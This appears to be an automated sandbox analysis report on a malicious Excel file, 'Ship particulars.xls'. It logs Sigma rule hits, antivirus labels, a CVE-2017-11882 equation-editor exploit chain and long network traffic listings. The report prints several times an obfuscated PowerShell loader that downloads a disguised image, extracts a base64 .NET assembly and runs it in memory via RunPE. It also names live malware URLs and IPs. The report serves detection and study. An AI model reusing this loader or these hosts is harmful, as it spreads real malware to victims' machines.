    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatingfollowerswithflowerese.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatingfollowerswithflowerese.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1324, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatingfollowerswithflowerese.vBS" , ProcessId: 3352, ProcessName: wscript.exe
    Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 192.185.89.92, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1324, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 91.92.254.29, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3352, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49173
    Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1324, Protocol: tcp, SourceIp: 192.185.89.92, SourceIsIpv6: false, SourcePort: 80
    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')", CommandLine|base64offset
    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatingfollowerswithflowerese.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatingfollowerswithflowerese.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1324, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatingfollowerswithflowerese.vBS" , ProcessId: 3352, ProcessName: wscript.exe
    Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 1324, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')", CommandLine|base64offset
    Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 1432, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3440, TargetFilename: C:\Users\user\AppData\Local\Temp\kj2gs3sh.r3u.ps1
    Timestamp:07/03/24-17:58:56.323699
    SID:2049038
    Source Port:80
    Destination Port:49173
    Protocol:TCP
    Classtype:A Network Trojan was detected

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?17198462358ZK;Avira URL Cloud: Label: malware
    Source: http://91.92.254.29/Users_API/syscore/file_ygeik543.xh0.txtAvira URL Cloud: Label: malware
    Source: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235pAvira URL Cloud: Label: malware
    Source: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235Avira URL Cloud: Label: malware
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\uh.uh.uhuhuh.uu.uh[1].docAvira: detection malicious, Label: HEUR/Rtf.Malformed
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{45674ED6-0137-4508-99E9-56BDBC83CE0D}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4924813.docAvira: detection malicious, Label: HEUR/Rtf.Malformed
    Source: Ship particulars.xlsReversingLabs: Detection: 21%
    Source: Ship particulars.xlsJoe Sandbox ML: detected

    Exploits

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 198.46.178.139 Port: 80Jump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49174 version: TLS 1.0
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

    Software Vulnerabilities

    barindex
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_035B05CF ShellExecuteW,ExitProcess,9_2_035B05CF
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_035B05F4 ExitProcess,9_2_035B05F4
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_035B04E8 LoadLibraryW,9_2_035B04E8
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_035B05A1 URLDownloadToFileW,ShellExecuteW,ExitProcess,9_2_035B05A1
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_035B05BA ShellExecuteW,ExitProcess,9_2_035B05BA
    Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Source: global trafficDNS query: name: hop.fyi
    Source: global trafficDNS query: name: hop.fyi
    Source: global trafficDNS query: name: hop.fyi
    Source: global trafficDNS query: name: hop.fyi
    Source: global trafficDNS query: name: hop.fyi
    Source: global trafficDNS query: name: hop.fyi
    Source: global trafficDNS query: name: hop.fyi
    Source: global trafficDNS query: name: hop.fyi
    Source: global trafficDNS query: name: uploaddeimagens.com.br
    Source: global trafficDNS query: name: hop.fyi
    Source: global trafficDNS query: name: hop.fyi
    Source: global trafficDNS query: name: hop.fyi
    Source: global trafficDNS query: name: hop.fyi
    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 91.92.254.29:80
    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
